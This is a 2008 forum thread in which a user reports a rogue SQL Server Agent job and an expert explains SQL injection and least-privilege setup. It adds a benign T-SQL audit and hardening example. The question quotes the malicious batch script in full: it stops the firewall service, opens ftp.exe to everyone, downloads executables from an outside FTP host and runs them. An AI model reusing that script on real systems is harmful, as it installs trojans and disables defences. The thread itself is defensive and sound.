SQL JOB created by virus

navan - 23 Jul 2008 10:14 GMT
Dear

List of some strange jobs created in SQL Server.
One of the jobs contains the following code

"Cmd /c Copy ias\dnary.mdb dnary.mdb
del ias\ias.mdb
del ias\dnary.mdb
Start net1 stop sharedaccess
md ZeHin
cd ZeHin
del *.* /f /s /q
Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F
echo open SuperQ.Vicp.Cc>k.x
echo new>>k.x
echo 123>>k.x
echo mget *.exe>>k.x
echo bye>>k.x
ftp -i -s:k.x
del k.x
Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N
echo for %%i in (*.exe) do start %%i>DoIt.bat
DoIt.bat&ping -n 10 127.0.0.1
DoIt.bat
del DoIt.bat"

It brings trojans to my server.
I have disabled, my server is online.
How to protect the SQL Server from creating jobs by unauthorized person?

Aaron Bertrand [SQL Server MVP] - 23 Jul 2008 12:36 GMT
> List of some strange jobs created in SQL Server.
> One of the jobs contains the following code
>
> "Cmd /c Copy ias\dnary.mdb dnary.mdb

This isn't SQL code, this looks like a batch file.  Which wouldn't run
directly from a SQL job unless it was saved as a .bat file and run using
xp_cmdshell (or something along those lines).

> How to protect the SQL Server from creating jobs by unauthorized person?

Well, the first thing is, don't use SA or a similarly privileged account in
your web apps.  Give them rights only in the databases they need, and only
to execute the stored procedures you define for them.  Avoid SQL injection
by using stored procedures, using strongly-typed parameters, and validating
input.  If you give your applications sysadmin rights, and blindly execute
user-entered strings as part of any SQL statement, you are begging for this
kind of thing to continue happening.

A
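
The checks and the least-privilege setup recommended in the reply above, as an added T-SQL example that is not part of the original thread. It assumes SQL Server 2005 or later; the names `AppDb`, `web_app`, the `app` schema, `dbo.Customers` and `app.GetCustomerByName` are hypothetical.

```sql
-- Added example; AppDb, web_app, app and dbo.Customers are hypothetical names.

-- 1. Who holds sysadmin? The web application's login should not appear here.
SELECT p.name, p.type_desc
FROM sys.server_principals AS p
JOIN sys.server_role_members AS rm ON rm.member_principal_id = p.principal_id
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
WHERE r.name = N'sysadmin';

-- 2. Review every SQL Agent job step, newest jobs first.
--    Steps with subsystem 'CmdExec' run operating-system commands.
SELECT j.name AS job_name, j.enabled, j.date_created,
       SUSER_SNAME(j.owner_sid) AS job_owner,
       s.step_id, s.subsystem, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
ORDER BY j.date_created DESC, s.step_id;

-- 3. Is xp_cmdshell enabled? value_in_use = 1 means it is.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 4. Least-privilege login for the web application: no server roles,
--    no table permissions, only EXECUTE on procedures in one schema.
CREATE LOGIN web_app
    WITH PASSWORD = N'<placeholder: replace with a strong password>',
         CHECK_POLICY = ON;
GO
USE AppDb;
GO
CREATE USER web_app FOR LOGIN web_app;
GO
CREATE SCHEMA app AUTHORIZATION dbo;
GO
-- Strongly typed parameter: user input is compared as data, never
-- concatenated into the statement text.
CREATE PROCEDURE app.GetCustomerByName
    @Name nvarchar(100)
AS
BEGIN
    SET NOCOUNT ON;
    SELECT CustomerId, Name FROM dbo.Customers WHERE Name = @Name;
END;
GO
GRANT EXECUTE ON SCHEMA::app TO web_app;
```

Because the `app` schema and `dbo.Customers` share the owner `dbo`, ownership chaining lets `web_app` run the procedure without any direct permission on the table.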
 